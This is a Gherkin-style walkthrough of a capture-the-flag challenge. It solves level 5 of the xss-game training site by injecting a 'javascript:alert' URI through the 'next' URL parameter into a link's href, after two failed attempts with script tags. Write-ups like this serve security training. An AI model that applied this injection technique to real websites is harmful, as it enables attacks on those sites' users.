## Version 1.0
## language: en

Feature: Cross-site scripting
  Site:
    Xss-game
  Category:
    Cross-site scripting
  User:
    kzccardona
  Goal:
    Interact with the vulnerable application to execute an alert
    using the URL https://xss-game.appspot.com/level5

  Background:
  Hacker's software:
    |  <Software name>  |    <version>   |
    | Microsoft Windows | 10.0.17763.437 |
    | Google Chrome     | 75.0  (64 bit) |
  Machine information:

  Scenario: Fail: Directly write "<script>" tag
    Given I wrote at the end of the URL JavaScript code as below:
    """
        https://xss-game.appspot.com/level5/
        <script>
              alert('Success')
        </script>
    """
    And I hit the enter key and the page reloads
    Then the page didn't show my alert
    And I can't get the flag

  Scenario: Fail: Use element inspector tool
    Given I try to inspect the code of the page
    When I find an "a" tag
    """
    <a href="{{ next }}">Next >></a>
    """
    And I try to assign a value to the var "next" using the console
    """
    next = <script>
              alert('Success')
            </script>
    """
    And I hit the enter key
    Then the console give me an error
    And I can't get the flag

  Scenario: Success: Adding a payload on URL
    Given an input for enter an email and a link that process the email
    Then I try to inspect the link value
    And I see that had the same value as the variable next
    And I try to modify its value giving it a value in the URL
    """
      https://xss-game.appspot.com/level5/frame/signup?next=test
    """
    And his property "href" took the value of "test"
    Then I assumed that I could attack that property
    And I try to add the payload in the URL
    """
      https://xss-game.appspot.com/level5/frame/signup?next=
      javascript:alert('This is XSS')
    """
    When I hit on enter key the page reloads
    And "href" property took the value of "javascript:alert('This is XSS')"
    Then I fill the email input
    And I click on next link
    Then the page shows my alert
    """
    Congratulations, you executed an alert:

        This is XSS

    You can now advance to the next level.
    """
    And I get the flag
